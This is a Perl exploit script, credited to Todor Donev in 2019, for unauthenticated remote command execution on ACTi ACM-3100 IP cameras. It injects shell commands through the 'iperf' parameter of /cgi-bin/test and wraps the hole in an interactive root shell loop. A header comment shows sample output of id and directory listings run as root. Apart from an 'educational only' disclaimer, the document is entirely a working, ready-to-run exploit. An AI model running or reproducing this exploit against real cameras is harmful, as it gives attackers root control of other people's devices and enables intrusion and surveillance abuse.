#!/usr/bin/perl # # ACTi ACM-3100 Camera Remote Command Execution Exploit # # Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> # # # Disclaimer: # This or previous programs are for Educational purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages # caused by direct or indirect use of the information or functionality provided by these programs. # The author or any Internet provider bears NO responsibility for content or misuse of these programs # or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, # system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's # responsibility. # # Use them at your own risk! # # (Dont do anything without permissions) # # # [test@localhost acti]$ perl actiroot.pl 192.168.1.1 # # [ ACTi ACM-3100 Camera Remote Command Execution Exploit # # [ ========================================================= # # [ Exploit author: Todor Donev 2019 <todor.donev@gmail.com> # # # id # # execute : /sbin/iperf -c ;id & # # uid=0(root) gid=0(root) # # # ls -la # # execute : /sbin/iperf -c ;ls -la & # # -rwxr-xr-x 1 0 0 14900 test # # -rwxr-xr-x 1 0 0 32028 80503736 # # -rwxr-xr-x 1 0 0 8872 macdev # # -rwxr-xr-x 1 0 0 29804 updatem # # -rwxr-xr-x 1 0 0 31788 update # # -rwxr-xr-x 1 0 0 28676 mpeg4 # # -rwxr-xr-x 1 0 0 137040 videoconfiguration.cgi # # lrwxrwxrwx 1 0 0 6 url.cgi -> system # # -rwxr-xr-x 1 0 0 27780 system # # drwxr-xr-x 2 0 0 1024 cmd # # drwxr-xr-x 5 0 0 1024 .. # # drw-r--r-- 3 0 0 1024 . # # # ls -la /etc/ # # execute : /sbin/iperf -c ;ls -la /etc/ & # # -rw-r--r-- 1 0 0 71 hosts # # drwxr-xr-x 3 0 0 1024 default # # drwxr-xr-x 2 0 0 1024 config # # -rwxr-xr-x 1 0 0 5834 protocols # # drwxr-xr-x 4 0 0 1024 ppp # # drwxr-xr-x 2 0 0 1024 dhcpc # # -rwxr-xr-x 1 0 0 211 inittab # # -rwxr-xr-x 1 0 0 26 host.conf # # -rwxr-xr-x 1 0 0 534 passwd # # -rwxr-xr-x 1 0 0 280 group # # drwxr-xr-x 2 0 0 1024 init.d # # -rwxr-xr-x 1 0 0 421 profile # # -rw-r--r-- 1 0 0 25 resolv.conf # # -rwxr-xr-x 1 0 0 10787 services # # drwxr-xr-x 2 0 0 1024 thttpd # # -rwxr-xr-x 1 0 0 251 fstab # # drwxr-xr-x 13 0 0 1024 .. # # drwxr-xr-x 8 0 0 1024 . # # # # # use LWP::Simple; print "[ ACTi ACM-3100 Camera Remote Command Execution Exploit [ ========================================================= [ Exploit author: Todor Donev 2019 <todor.donev\@gmail.com> "; if(not defined $ARGV[0]) { print "[ Usage: perl $0 [target]\n"; print "[ Example: perl $0 192.168.1.1\n\n"; exit; } my $host = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0]; while(1) { print "\# "; chomp($cmd = <STDIN>); if($cmd eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';} last if $cmd eq 'exit'; last if is_error(getprint($host."/cgi-bin/test?iperf=;${cmd}")); print $resp; }